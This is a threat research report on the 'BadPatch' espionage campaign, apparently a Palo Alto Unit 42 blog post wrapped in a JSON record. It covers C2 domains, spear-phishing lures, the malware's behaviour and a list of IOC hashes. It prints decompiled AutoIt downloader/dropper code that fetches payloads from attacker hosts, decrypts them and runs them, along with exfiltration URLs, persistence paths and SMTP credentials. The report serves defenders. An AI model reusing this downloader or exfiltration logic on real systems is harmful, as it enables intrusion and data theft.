{
	"id": "8b0a1c40-ab65-436f-9a7b-758d5064650c",
	"created_at": "2026-04-06T01:30:54.345757Z",
	"updated_at": "2026-04-10T03:23:51.477053Z",
	"deleted_at": null,
	"sha1_hash": "236ea5241550bfc164e1d4a70df418046bcb5dc9",
	"title": "BadPatch",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2859385,
	"plain_text": "BadPatch\r\nBy Tomer Bar, Simon Conant\r\nPublished: 2017-10-20 · Archived: 2026-04-06 00:46:55 UTC\r\nIntroduction\r\nIn April 2017, in collaboration with Clearsky, Palo Alto Networks Unit 42 published an article about our research into\r\ntargeted attacks in the Middle East. In that research we discussed two new malware families we named KASPERAGENT\r\nand MICROPSIA.\r\nSince then, we have continued our research into the Command and Control (C2) infrastructure associated with\r\nKASPERAGENT and MICROPSIA. This ongoing research lead us to a new Middle Eastern campaign. Our findings from\r\nthis new campaign include C2 infrastructure, new attack methods, four types of malware (including Android malware), a\r\nsystem for management of stolen victim data and some detail of the actors.\r\nIt is notable that our research has shown that this newly-identified attack campaign dates back to at least June 2012, over\r\nfive years ago.\r\nIn this blog, we outline the results of our research into this new campaign so far.\r\nFinding the New Campaign\r\nOur discovery of this new campaign begins where our previous KASPERAGENT and MICROPSIA research left off.\r\nPivoting from Previous KASPERAGENT and MICROPSIA Research\r\nOne of the C2 servers we observed in our earlier KASPERAGENT and MICROPSIA research was mailsinfo[.]com. The\r\nfirst IP address that this domain resolved to from about mid-May 2015 through October-November 2015 was\r\n148.251.135[.]117.\r\nWe used passive DNS (pDNS) and found the server mail.pal4u[.]net on 148.251.135[.]117 starting mid-May 2015. We also\r\nfound other servers on this IP address. We do not believe this necessarily gives a link between campaigns found on this IP\r\naddress as it appears to be shared by multiple unrelated third parties. However, the nature of activity and some malware\r\nartifacts on this IP address does suggest a possible link to the Gaza Hackers group.\r\nC2 Infrastructure\r\nAs we followed our leads from the previous KASPERAGENT and MICROPSIA research and dug into the server\r\nmail.pal4u[.]net on 148.251.135[.]117 that research led us to find the C2 infrastructure of this new campaign.\r\nDigging into Pal4u\r\nThe WHOIS for pal4u[.]net appears to be a Palestinian hosting company. The DNS records for pal4u[.]net gives us, in\r\naddition to the “WWW” hostname, the Name Servers (NS) “NS1” and “NS2” and additional IP address 195.154.216[.]74.\r\nWe found six additional domains that used palu4u[.]net as NS, and which all shared the same historic IP address\r\n195.154.216[.]74 (Figure 2). From the seven total domains, we observed six as malware Command \u0026 Control (C2),\r\nexfiltration, malware download servers, and/or in associated malware code:\r\nPal4u[.]net\r\nPal2me[.]net\r\nPay2earn[.]net\r\nShop8d[.]net\r\nTs4shope[.]net\r\npal4news[.]net\r\nWe only found one of the seven domains associated with this IP, ads4market[.]net, not associated with malware activity. We\r\ndid not find any legitimate activity or content associated with these six domains during the period of associated registration.\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 1 of 16\n\nFigure 1- C2 domain links\r\nWhile there is historic WHOIS for pal2me[.]net and shop8d[.]net, research into the registrant information suggests this is\r\nrelated to the ISP rather than the actors using the site for C2.\r\nWe also found the DNS RNAME “a.faris.live[.]com” was used, but this also seems to be related to the host ISP rather than\r\nthe site owner.\r\nUnderstanding that we were looking at a collection of linked malware C2 servers, we started to look into the attacks\r\nmethods and malware that used this infrastructure.\r\nAttack Methods\r\nWe observed initial attacks using this infrastructure were against victims via spear phishing. However, for the first time in\r\nany known Gaza Hackers-linked campaign, we also found a limited use of vulnerability exploits – RTF exploit CVE-2012-\r\n0158 documented by Citizenlab (Part 3 – “The Curious Case of the Shared Exploit”). The attackers used the RTF exploit to\r\ndownload their “BadPatch” Windows malware from hacked WordPress site wp.piedslibres[.]com/wp/wp-includes/js/Next.scr.\r\nSHA256 d759dcbebee18a65fda434ba1da5d348c16d9d3775fe1652a1dacf983ffc93b8\r\nFirst seen 2015-05-13\r\nFilename لمستجدات.doc , (Developments.doc)\r\nWe found a second attack sample that used the same exploit, that also downloaded the same malware from the compromised\r\nserver.\r\nFilename 6660491190525a7413b683b91a6c8b0082aa71e6dd6291d11ec26e1e3cf55a57\r\nFirst seen 2015-06-15\r\nFilename تسنيم.doc (Tasneem.doc – the military organization of Fatah (political Palestinian movement))\r\nIn most of the attacks we observed the malware will display a blank Microsoft Word decoy file, or a Microsoft Word file\r\nwith error message:\r\n\"An error occurred, please try your request again later\".\r\nWe did observe some variations in this attack. The first malware sample that we identified (compiled on 12 June 2012)\r\ndropped an Adobe Flash decoy file (Figure 2):\r\nSHA256 92a685c0c8515ef55635760026039564ddd0b299a2b0c4812df3c40aba133812\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 2 of 16\n\nFigure 2- Adobe Flash decoy\r\nSamples typically employ decoy filenames tailored to the spear-phished target:\r\nSHA256 30282a807c2ee27b0d1dda310e41487f5018bc5fc5df8af6c13d08df34f2b6df\r\nFilename جدا وسري جدا عاجل.gz (Very urgent and very confidential. Gz)\r\nSHA256 cc8020c36156c7e5c8cfbbb32bc8d7f03536510f4e3b38b22e0abdb9ad90c90e\r\nFilename ,للمالية المستحقني اسماء.scr (The names of the beneficiaries of Finance. scr)\r\nSHA256 1a65e43afaaff90b4124cbef21fadc319f10fba4843d09837219400b0dbcc285\r\nFilename االعرتاف حماس يتحدى الهباش.scr (Habash defies Hamas recognition.scr)\r\nSHA256 2c64a3d6b896ee1b58b9cf55531b7256de45025d60b1f4be764b385de087b52f\r\nFilename Statement of Account-ARABBANK.exe\r\nMalware Analysis\r\nWe collected 148 malware samples in this campaign, using the C2 servers that we identified, and grouped them into four\r\ncategories:\r\n1. Microsoft Visual Basic Malware – exfiltrates data via SMTP (port 26), and HTTP.\r\n2. Autoit malware – early versions also used SMTP for exfiltration, but mainly HTTP.\r\n3. Autoit downloader \u0026 dropper (downloads and executes the Autoit malware)\r\n4. Android malware – exfiltration via HTTP (first seen December 2015)\r\nMicrosoft Visual Basic malware\r\nUpon infection the malware copies itself to %appdata%\\microsoft\\microsoft [0-9]{9-15}\\dwm.exe (9-15 digits in directory\r\nname “Microsoft”), and adds a link to the malware executable in the startup folder for persistence.\r\nThese variants include system information collection (operating system, computer name), keylogger output, and browser\r\npassword collection from Internet Explorer, Chrome and Firefox.\r\nKeylogger and system info exfiltration is done via HTTP Post:\r\nlms/getdata.php?myAction=add_line\u0026macName=…$\u0026computer_id=App.EXEName\u0026mac_address=…\r\n\u0026dns_domain=nnn\u0026domain=bbb\u0026content2=$FRESH:%20%20ESC%20pango2012ENTR\u0026ver=3\u0026mac_time=tt\u0026patch_user_id=mgh2\u0026patch_group_i\r\nFile exfiltration is done via SMTP port 26, with the SMTP credentials hardcoded encrypted in the malware code. Some\r\nmailbox examples:\r\nuser: sender_b@pal4u[.]net\r\npassword: sender@123\r\nubuntu_net@pal4u[.]net\r\nubuntu_send@pal4u[.]net\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 3 of 16\n\nFigure 3- SMTP encryption settings\r\nThe list of files for exfiltration are written to the malware folder as “sysfiles.txt”. A file “1.done” is generated with content\r\n\"done\" after successful exfiltration. The file “mac.txt” contains the computer MAC address. Some versions exfiltrate recent\r\nfiles, others collect and exfiltrate files matching a hardcoded extension list:\r\n*.xls;*.xlsx;*.pdf;*.mdb;*.rar;*.zip*.doc;*.docx\r\nAutoIt Malware\r\nWe observed a shift from Visual Basic to  AutoIt malware in this campaign around March 2016. AutoIt is a freeware\r\nBASIC-like scripting language designed for automating the Windows GUI and general-purpose scripting.\r\nThis malware achieves persistence by writing to “%appdata%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\Microsoft.lnk\" using the WScript object.\r\nIt attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and\r\nmotherboard:\r\n1. Checks for processes “VBoxService.exe\", \"VBoxTray.exe\", \"VMwareTray.exe\"\r\n2. WMI query on Win32_DiskDrive, looking for \"VBOX HARDDISK\",\"QEMU HARDDISK\",\"VMWARE VIRTUAL\r\nIDE HARD DRIVE\", \"VMware Virtual S SCSI Disk Device\"\r\n3. WMI query on Win32_BIOS \"Found Vbox BIOS version\"\r\n4. WMI query on Win32_Baseboard “Found VMware-style motherboard”, \"440BX Desktop Reference Platform\".\r\nName=\"Base Board\"\r\nThe malware deletes Chrome and Firefox cached password files, requiring the user to re-enter site passwords, affording the\r\nkeylogger the opportunity to capture them.\r\nThe malware can be instructed to kill the malware process by Process ID, or by hardcoded name.\r\nIt can update itself by downloading and executing a newer version:\r\nh__p://m103.pay2earn[.]net/public/versions/[\"svchost\" \u0026 $i \u0026 \".zip] (where i=1 to 7).\r\nThe new version is saved at %appdata%\\Microsoft\\updte\\svchost.scr.\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 4 of 16\n\nEnvironment data exfiltration via POST\r\nIt will perform a WMI query to enumerate installed security products.\r\nIt stores data in log files:\r\nSpecific attacker username stored at %appdata%\\Microsoft\\updte\\usu.log\r\nMAC address %appdata%\\Microsoft\\updte\\mac.log\r\nErrors are logged at  %appdata%\\Microsoft\\updte\\log.log\r\nThis data is exfiltrated along with Operating System version and architecture using HTTP POST:\r\nh__p://m103.pay2earn[.]net/devices/settings\r\n/devices/settings?mac_address=\r\n\u003cmacAddress\u003e\u0026content=%20Start%20Downloader%20majdTest%201/2017Anti%20Type:%20%20%20OS%20Version%20=%20WIN_7%20|%20X64\r\nh__p://m103.pay2earn[.]net/logs/new\r\n/logs/new?name=\u003ccomputerName\u003e$\u0026computer_id=App.EXEName\u0026mac_address=\r\n\u003cmacAddress\u003e\u0026content=$%20Start%20Downloader%20%20majdTest%201/2017\u0026patch_username=majd\r\nScreenshots via SMTP\r\nThe malware takes screenshots on the victim computer, exfiltrating them using SMTP (port 26) as “GDIPlus_Image1.jpg”\r\nand “GDIPlus_Image2.jpg”.\r\nThe SMTP configuration is saved as encrypted RC4 strings, decrypted with password !@#$%^\u0026*()\r\nFigure 4- SMTP RC4 encrypted strings init\r\nMail is sent, in this example, using the string \"Start Downloader majdTest 1/2017\".\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 5 of 16\n\nFigure 5- SMTP mail sending function\r\nThe emails are sent from an email address at the C2 server, to a recipient address on the same server. Decrypted example:\r\nsmtpserver:  m103.pay2earn[.]net\r\nfromname:    sn@m103.pay2earn[.]net\r\nfromaddress: sn@m103.pay2earn[.]net\r\ntoaddress:   asf@m103.pay2earn[.]net\r\nusername:    sn@m103.pay2earn[.]net\r\npassword:    sn_$_2016\r\nWe observed a single variant using an obfuscated AutoIt script\r\n(5c6e531738c1380ec09c1ec0f1438cee5077e6cbade8af87710b8be2f0aaaac7). Another outlier variant was keylogger-only,\r\nsupporting intercepting only Arabic and English characters\r\n(42adec426addf3fd0c6aff406b46fa82d901f5a9bed7758a243458961349a362).\r\nAutoit downloader / dropper\r\nThis simple component downloads and executes malware from the C2 server (e.g. pal4u[.]net or m103.pay2earn[.]net).\r\nSHA256: 2d75335f8c7d4e956dcd637f480c94f6ed49a9870375aad0eee1e651d6e7ac02\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\ngtyu()\r\n_zizi2()\r\nFunc _zizi2()\r\n  Local $sfilepath = _winapi_gettempfilename(@TempDir)\r\n  Local $hdownload = InetGet(\"http://www.pal4u.net/zzzzz\", $sfilepath,\r\n        $inet_forcereload, $inet_downloadbackground)\r\n  Do\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 6 of 16\n\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n    Sleep(250)\r\n    Until InetGetInfo($hdownload, $inet_downloadcomplete)\r\n    InetClose($hdownload)\r\n    Local $ialgorithm = $calg_rc4\r\n    If _crypt_decryptfile($sfilepath, \"F:\\ddd.zip\", \"?\u003e\u003cMNBVCXZ\", $ialgorithm)\r\n    Then\r\nSleep(250)\r\nLocal $zip1 = _ezezez(\"F:\\ddd.rar\", \"F:\\\")\r\n    EndIf\r\nEndFunc\r\nFunc gtyu()\r\n  Local $sfilepath = _winapi_gettempfilename(@TempDir)\r\n  Local $hdownload = InetGet(\"h__p://www.pal4u[.]net/dddd\", $sfilepath,\r\n        $inet_forcereload, $inet_downloadbackground)\r\n  Do\r\n    Sleep(250)\r\n    Until InetGetInfo($hdownload, $inet_downloadcomplete)\r\n    InetClose($hdownload)\r\n    Local $ialgorithm = $calg_rc4\r\n    If _crypt_decryptfile($sfilepath, \"F:\\dd.docx\", \"ZXCVBNM\u003c\u003e?\", $ialgorithm)\r\n    Then\r\nShellExecute(\"F:\\dd.docx\")\r\n    EndIf\r\nEndFunc\r\nFunc _ezezez($szipfile, $sdestinationfolder, $sfolderstructure = \"\")\r\n  Local $i\r\n  Do\r\n    $i += 1\r\n    $stempzipfolder = @TempDir \u0026 \"\\Temporary Directory \" \u0026 $i \u0026 \" for \" \u0026\r\n                      StringRegExpReplace($szipfile, \".*\\\\\", \"\")\r\n  Until NOT FileExists($stempzipfolder)\r\n  Local $oshell = ObjCreate(\"Shell.Application\")\r\n  If NOT IsObj($oshell) Then\r\n    Return SetError(1, 0, 0)\r\n  EndIf\r\n  Local $odestinationfolder = $oshell.namespace($sdestinationfolder)\r\n  If NOT IsObj($odestinationfolder) Then\r\n    DirCreate($sdestinationfolder)\r\n  EndIf\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 7 of 16\n\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n  Local $ooriginfolder = $oshell.namespace($szipfile \u0026 \"\\\" \u0026 $sfolderstructure)\r\n  If NOT IsObj($ooriginfolder) Then\r\n    Return SetError(3, 0, 0)\r\n  EndIf\r\n  Local $ooriginfile = $ooriginfolder.items()\r\n  If NOT IsObj($ooriginfile) Then\r\n    Return SetError(4, 0, 0)\r\n  EndIf\r\n  $odestinationfolder.copyhere($ooriginfile, 20)\r\n  DirRemove($stempzipfolder, 1)\r\n  Return 1\r\nEndFunc\r\nThis downloader example also displays a decoy file (bbb.docx):\r\nSHA256: 2d75335f8c7d4e956dcd637f480c94f6ed49a9870375aad0eee1e651d6e7ac02\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n#NoTrayIcon\r\n$appdate = @AppDataDir\r\nLocal $ifileexists = FileExists(@AppDataDir \u0026 \"\\bbb.docx\")\r\nIf $ifileexists Then\r\n   FileDelete(@AppDataDir \u0026 \"\\bbb.docx\")\r\nEndIf\r\nDirCreate($appdate \u0026 \"\\Microsoft\\updte\\\")\r\nFileInstall(\"bbb.docx\", @AppDataDir \u0026 \"\\bbb.docx\")\r\nIf ProcessExists(\"svchsots.scr\") Then\r\nElse\r\n   FileInstall(\"svchsots.scr\", @AppDataDir \u0026 \"\\Microsoft\\updte\\svchsots.scr\")\r\n   Run(@AppDataDir \u0026 \"\\Microsoft\\updte\\svchsots.scr\")\r\nEndIf\r\nShellExecute(@AppDataDir \u0026 \"\\bbb.docx\")\r\nAndroid Malware\r\nThe actors do not miss the opportunity to also collect data from the Android devices of their targets.\r\nAs well as the typical ability to update the malware, this Android malware collects and exfiltrates device files, SMS\r\nmessages, voice calls, and can also be used to remotely record sound or video using the device. A follow-up blog will\r\nexamine this malware in detail.\r\nRecords Management System and Victims\r\nThe threat actors have developed their own, custom system to manage the data exfiltrated by their victims, \"إدارة نظام\r\nالسجالت”) \"Records Management System”). Server logon requires 2-Factor authentication (2FA).\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 8 of 16\n\nFigure 7- RMS SMS 2FA\r\nFigure 6- RMS Logon Screen\r\nDuring the course of our research, we observed a newly introduced bug in their authentication. Navigating directly to the\r\npage “sms.php” bypassed the initial password entry requirement, taking us directly to the SMS verification page (Figure 6).\r\nFurther, we discovered that navigating directly to “/lms/index.php” no longer redirects the user to login.php, but instead\r\ngranted authenticated access to the system.\r\nFigure 8- Records Management System\r\nThis allowed us to enumerate the victims contacting the exfiltration server (Figure 9,) through March 2016.\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 9 of 16\n\nFigure 9- Victims by country\r\nAs reflects the nature of campaign, we notice a small overall number of victims. That the majority of victims appear\r\ndomestic is also not unusual in such campaigns, although we also noted the actor infecting their own test machines in some\r\ncases (Figure 10).\r\nFigure 10- Testing Logs\r\nThe Adversary\r\nWe find some hints in sample filenames, Microsoft Visual Project directory names, and HTTP POST parameters, suggesting\r\nthe names of some of the actors involved in this campaign, and a possible link to an official Gaza Bureau.\r\nS:\\sh\\work files from shaaban\\4shopfiles tajas\\shop8d\\Project1.vbp\r\nC:\\Documents and Settings\\HADJYOUB.HADJ-1065B94515\\Bureau\\cm\\Project1.vbp\r\nPossible nickname strings that we observed include:\r\nShaaban, Hadjyoub, OMR, mgh2, rashed, Shady, majd , f2b, jno, ajr , hmg, vip, 2ta, asf, h2m, mag\r\nNaming\r\nThe actors appear to name this malware “Patch”:\r\n\"\\2014-03-17\\exe\\gaza\\Project1.vbp\"\r\nV:\\Batch Versions\\\r\nIn Arabic, “P” and “B” are phonetically similar, leading to common B/P misspellings.\r\nEmbedded strings:\r\n\"Old - update patch and check anti-virus.. \"\r\n\"PatchNotExit-- Check Version\"\r\n\"PatchNotExit-- download now\"\r\n\"PatchNotExit-- Version Patch\"\r\nServer communication parameters:\r\nlms/getdata.php?myAction=add_line\u0026macName=…$\u0026computer_id=App.EXEName\u0026mac_address=…\r\n\u0026dns_domain=nnn\u0026domain=bbb\u0026content2=$FRESH:%20%20ESC%20pango2012ENTR\u0026ver=3\u0026mac_time=tt\u0026patch_user_id=mgh2\u0026patch_group\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 10 of 16\n\nThe “patch_user_id” parameter appears to refer to the individual actor managing this victim.\r\nAge of Campaign\r\nThe oldest sample we observed has a compile date of 12 June 2012. The C2 server linked to that sample, pal2me[.]net, was\r\nalso first registered on the same date. This campaign has been running for at least more than five years, and continues to this\r\ndate.\r\nDevelopment Over Time\r\nThe oldest sample we observed (above) supported exfiltration of victim data using email (technique is detailed in the\r\nmalware analysis section):\r\n92a685c0c8515ef55635760026039564ddd0b299a2b0c4812df3c40aba133812\r\nC:\\Users\\Shady\\Desktop\\only email with slide show\\Project1.vbp\r\nKeylogger functionality is introduced:\r\n106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea\r\nE:\\work here\\ready kl send recent files\\Project1.vbp\r\nNew keylogger version:\r\n17a4126fb1fb19885d78c82271464d82af8618b7d1b7d8901666c1121ddb2ba1\r\nD:\\000 work\\21.3 GB\\newSpoofKL\\Project1.vbp\r\nNew file exfiltration test version (details are in the malware analysis section):\r\n9a8acd988089e7f9dd04f971374f766db519e854d42e8052b0d98b4c9c6b67e4\r\nY:\\My Work\\VB 6\\Get Files\\GFiles 14-09-2015 - Working tst only\\Project1.vbp\r\nVisual Basic versions, new downloader:\r\n224b5af4ca4de234f03408487f075f0d638826cb6f65944a3e8dcbaac4372e79\r\nQ:\\newPatch\\downloader\\exe site\\shop\\Project1.vbp\r\nDownloader version 2.8:\r\nd906118fb36a0cc4e83121d4d606ad685645252e8e0791f793057499d8751bf0\r\nJ:\\dowloader 2 8\\downloader\\site\\Project1.vbp\r\nVersion M103, pointing at the currently-live C2 server m103.pay2earn[.]net. Current server registration dates to 8 February\r\n2016, the compile date of this malware was 31 March 2016.\r\nSha256 - d9253c808d83ace06f885479e0807246a29cb9967ea0d0855f5a3802825b13db\r\nW:\\newPatch\\exe vb m103 30 3 2016\\Project1.vbp\r\nConclusion\r\nDiligence in investigating infrastructure associated with a previously documented campaign, led us to another possibly\r\nunrelated campaign, crossing paths in hosting.\r\nThis allowed us to uncover a previously unknown C2 and exfiltration infrastructure, associated malware, and the first time\r\nthat we’ve observed this group using exploits.\r\nThe simplicity of the malware and relative unsophistication of C2, exfiltration and stolen data management belies the\r\ndemonstrated fact that this very targeted, low-volume campaign has been working fine for these actors for five years, and\r\ncontinues today.\r\nCoverage\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\n1. WildFire accurately identifies all malware samples related to this operation as malicious.\r\n2. Traps prevents this threat on endpoints, based upon WildFire prevention.\r\n3. Domains used by this operation have been flagged as malicious in Threat Prevention.\r\nAutoFocus users can view malware related to this attack using the “BadPatch” tag.\r\nIOCs can be found in the appendices of this report.\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 11 of 16\n\nAppendix I – Hashes\r\n1a0c0a0c74d085d6e90c5d96517926218fc55cc161f5c1e5dbb897f40d1f5164\r\n26e3d2dd7b70701aff8552889c899b7915b06f0b979a4766076681dd01abd978\r\n16c151ffe5e439a9383900738b4f8938cd33ba1781b62d8e2ee0686336a7145c\r\n9a4ed995dfd9d468715dfe4906265059aa3bb1e0d6ceb547e84001661a023a9d\r\nf1e616aecf6205daaf6c55898f86092055fe85a3825837c688c2e7545f6efb7e\r\ndb829b0d7396feaef2a4555b9d4fdf1b00d287dad93585e1c6c54f9cee0e9d4f\r\nabaf5a7d82e6db68fb73af18bf1f5e37b200f04dcc6e34da98ad044d9f411022\r\n04b8b48a795bcfe2b7344c2bbc409e85641e412c35ff490e7ae074e7d48698f7\r\n668b4c01e0493dc2b8b3a1b7134ce3811ef1449c2807ef6ca1c0b8356b90a2ed\r\n342de173d65d604e0935808b1d6a617060602c86e543bdf1c4c650812dec3883\r\n6180311025913c26ff8ac90b57b3fad61e21cdd896ea8b26a5ee14e6e663f6bb\r\n1d2a85a88153061ea17c6eeb9394f1d969ed6f0db526c7ddf79919676d4ca012\r\n3bb663567994bae2da06ea84a75b5205b7fa38dd8253ab326bfa4c50a90939ac\r\n4a1a5456123ef756956cc1d9a53f44dab040421700edf051f21671abe7e61d69\r\n47ecddb2f7f7242a3fd6cf9d08715512644f3ca199e779f737762150765b3027\r\n32667a9bfb24f505f351804d8516e2f5cf7f88ba6ef4de4db4463234ba4a3ea1\r\n68cd91e61a1bd6b5a1f39e45920c887be9603e85ca4e03b156cdc7acbe66f7c7\r\n56904fea473c40b9cf39de854a81896e8ba8f2bc1415101e69c25c065eb9773e\r\n0274e5f807a951cc68c0fd5af3fc9fa7b8a7305609da8144dacf69d0d39a23a4\r\n3ce1ad8a7f90404bdfc8157689742448ff675d094767a10c9cdf1e08ce068c55\r\nacc351ce2d3bf1bacb10bf379c6575fdb98e7c0fc2c69d20a7a7e3cf34615ae1\r\n19c25fa8a43b9da08fb5a78c03c554f23c0635ce618e789296fd35d748603fd4\r\n9e87eff7c42c077486531d6a178cab830c19aa787a18bc7ba5334a682cf82312\r\n1d4d3ad6a1330ada787c11dcf39bcf4864745aa440bfe1a45291f82b5467849f\r\n01d08050e532145ebb08398c51ac387979d34526918b8b21d0a3d0bed1ba3487\r\nb3847e10df393052222da931a96bedacf6d862e3470256dfb234a93947a23e82\r\n71015d0586123eac15c36aa4747fb60d03e671d5b5b4608818258320e33512e7\r\nc0e24060684d376068acdb40636392eb5627b410f9cb67428008415d288cb7f9\r\n0be090f3b01713a28f5bc94feb41f07ccd2814e0c7a58f5226242f96e80baaec\r\n20d337997e2a79015aa711bda443d2c0248959f15f007ec469839c7fa4418b9b\r\nef6e26502bb160be3154d7a34a461bbbc1bf8eaf3142c64658d14707836badec\r\n40929deab63f001f99973dffe6674e8bf0347f5dc30b5fb2d38e00667b90be7b\r\n584de1b855adaabc329639d09c77512a5f05099ecd629698b04893ac58fba01c\r\n90a86513076a32328e654f241226f454a5b39d76ea1a3119432aa9bb4253f775\r\n799c5a2dd25f180b4d4dda72da8da55bc6a99e2f01068880d7e3b58f8687242a\r\n6bbfd7f427458a485946d09318260cc484191a7d2e6f20dc0c143065716ff378\r\n8c01e58a2523297599342e38b6f8559b67d82bc790963b7a96802f30d337f295\r\nf8b022d3be92bf893b92ea235dd171443ac61330d008a0a786a0af940f2c98a7\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 12 of 16\n\n6ed9b8b0c478e30bc4f25bfcae3652b3937d735457b41146286173c54f3d5779\r\n28fb8f3858df045f3a1979f66ac9793f89f42324fcac8339f9f0fb7e566dbf16\r\n802a39b22dfacdc2325f8a839377c903b4a7957503106ce6f7aed67e824b82c2\r\n224b5af4ca4de234f03408487f075f0d638826cb6f65944a3e8dcbaac4372e79\r\n39655262901bc4a35867fa458a6025aa1175613c57ef51336412c32ca61715a1\r\nd49c16c0aacdb700f5afab86b20640a85c01d31b81c854c6a49eb62b8af68b68\r\n99ea3a10ea564b980a10e969b9b70fdef9be0b53ea4dee331cac7ebbdef65c47\r\na6c0ef11f8d3f12215a9d2d4d461f0eb92f4f305bdd32c2bb3e3a7196f8bb26d\r\n8b322ebd9dfae74c531f70a32b7d5689c394c6e5455575de53cc8984f7ebdbe5\r\n4c3a6c5a8a7a03581bf337dfb7572fb919a7d0414179019836b909e5e40921dc\r\n48845b4d384665b2078b1b4ed55a29fc4b2634e38d2c05ee29fb7a24e5a5c7f2\r\n3984d2400880e2f87f0c0e0e9d8f0e8e4b81971b53f66d840d1733a1cba6ccb1\r\nb9eb60c690b19a13da8717c4ba60e2bf9c4cda92fb9a723bed6011b08ea1b0ca\r\n1b6282350a25f9e362c68d359277746bc5039a0532e05375b06e9688622df6ba\r\nca2e49411ca8c2f8071bc5e12a8266444db7c1a7d0651d9fa9422970024f2150\r\n5c6e531738c1380ec09c1ec0f1438cee5077e6cbade8af87710b8be2f0aaaac7\r\necd6fa73cf527025792c4f1ee13acbd1c1219217f6da5aed2aaed11ea8453393\r\nfc06a74968ad0db68f26fa5e306a279728617fde7f3b8a8ddfb449f02bbac2c9\r\n934e56b74a5ca093857042c5b0371661134d29ea405d444bd2d602c74c20b9d2\r\n4c4d9e0062225311584fbf25b79e2a5b9a98dc2a3a43e736621082d8a92f18fe\r\n5e1173cc0c8226881a5fa21e6811e96db732c4ee9dfa2d3455c650d4522fe732\r\ne4400d9f128bf9ba924d94f1c87cfe882cc324d607ffdcbb03aaad6cdf71d2ef\r\n1dec4ec17c7bfe5abc9bb0a885e4cc5a2e5ab6a9676bb9f445402b84599ec915\r\n2f9eedcdda4f28ca08ece26a58e859062a6c0b9cf7f319b3eaa8d9f034c76d20\r\nef03d20595daa112f7652a11f2f7c2cac37216dae9bbd1aa87e482fd204c858e\r\n4246159ae6234697ed015c8c222ce053a7eaf83e2960d1c49339e72184be7e40\r\nb9440d29e2104cc3411c71c5db504dbc043c77aee24154ac68409df97c5eff49\r\na33bccaa7d2d3797f25edfae846f1e7757b50633b374f8ce1faf7a5934784817\r\n3c55a81f460804e2e39a1d3dc556fa5a93fe7ce8c139f8b68f1e5ca98f62875c\r\n0a376070679f6a31b2f6aaef23747f930544ab77ad01d30007f6d0ccf2bead60\r\ncdf964200bb9130c09d1bfd17677e2da5808c179a2cd6d49fa32780df1b5b92a\r\n92a685c0c8515ef55635760026039564ddd0b299a2b0c4812df3c40aba133812\r\ne73dd4c69a9a9fedd40c290bad68115e3645e74d1d68af0d7fe77ef7c0c5e875\r\ne7fb8bf35fb9bfa2f20fcc293939aad71d5fc39af36defb5150e2f394bb1500e\r\ncd933c6cc8450135deacd61a51e1b425ff7516cac078b92fe1b6f602e4c39e53\r\n025ab87dc729cbf284104a8c9872b63e486ad8af9aef422906743feb0db04224\r\n42adec426addf3fd0c6aff406b46fa82d901f5a9bed7758a243458961349a362\r\n78301ce0bb93dea81f4d70ebb224cc076e7f1e4c38b65afbbc1ad8d4c4882893\r\n5ea75fcdd2be820efdddc411fce9b6d277b66d3356ab8f79bcf542a4ce9fdfa0\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 13 of 16\n\nc595e47f8e50e8f0ffdc3258f2dcc9411150c3ea00709341c6d4e42d578e46ae\r\n201642c6d1341127aa0137e20db8a3d2da0412fb06ff14eae0c61f6174a44045\r\nfedf49896daa893608deaec7b36a4acb8fbedf7363788c35a6c0431ad0fadca9\r\n22ff8ce9840bae9c9c9aa107e689ec287abb93d585a469c442b295146b9c10c2\r\n30aa9b1c18bb494a01817b5fc0f7418efe2022e7335e815d96dcb8c1fe63e8e8\r\n830cb27f0c584d55267a4e0f6ddcb00c53ce1906946f5d490a26729d38d12057\r\n7370c81abf55a39918a537d1e49a51d74df2042883d11062383038367c864087\r\nd9253c808d83ace06f885479e0807246a29cb9967ea0d0855f5a3802825b13db\r\nffea93677d1c404900ea5ba20631625ea2e28a22c3af02155c747f2f25429885\r\na25abe1c21bec0c0259270aa2333ee1d1b6a327a356f5434c42558143a252afe\r\nce606c710aa001b09f0b51b78bf8675d8b1be4d99714b1a3b9ca245865fec508\r\n98f57b4693bbe9d469821f5433004edafe6ddf8964fa1ef1465ee73fbce24e0c\r\n18c84b6f7e58b2867ec6f3e7c7998ac6901fd485d503d32c8fabff93744574d1\r\n9b2c33764252c2bf807c837d80bffc21eeab87e7129c2d3e9b9b7a1eeee2de84\r\n24a9c57bb4cbb3d1b89c4e7affad599d431de4f007d4c54a4da25a8a2ba4f116\r\n17a4126fb1fb19885d78c82271464d82af8618b7d1b7d8901666c1121ddb2ba1\r\n278dba3857367824fc2d693b7d96cef4f06cb7fdc52260b1c804b9c90d43646d\r\n2d75335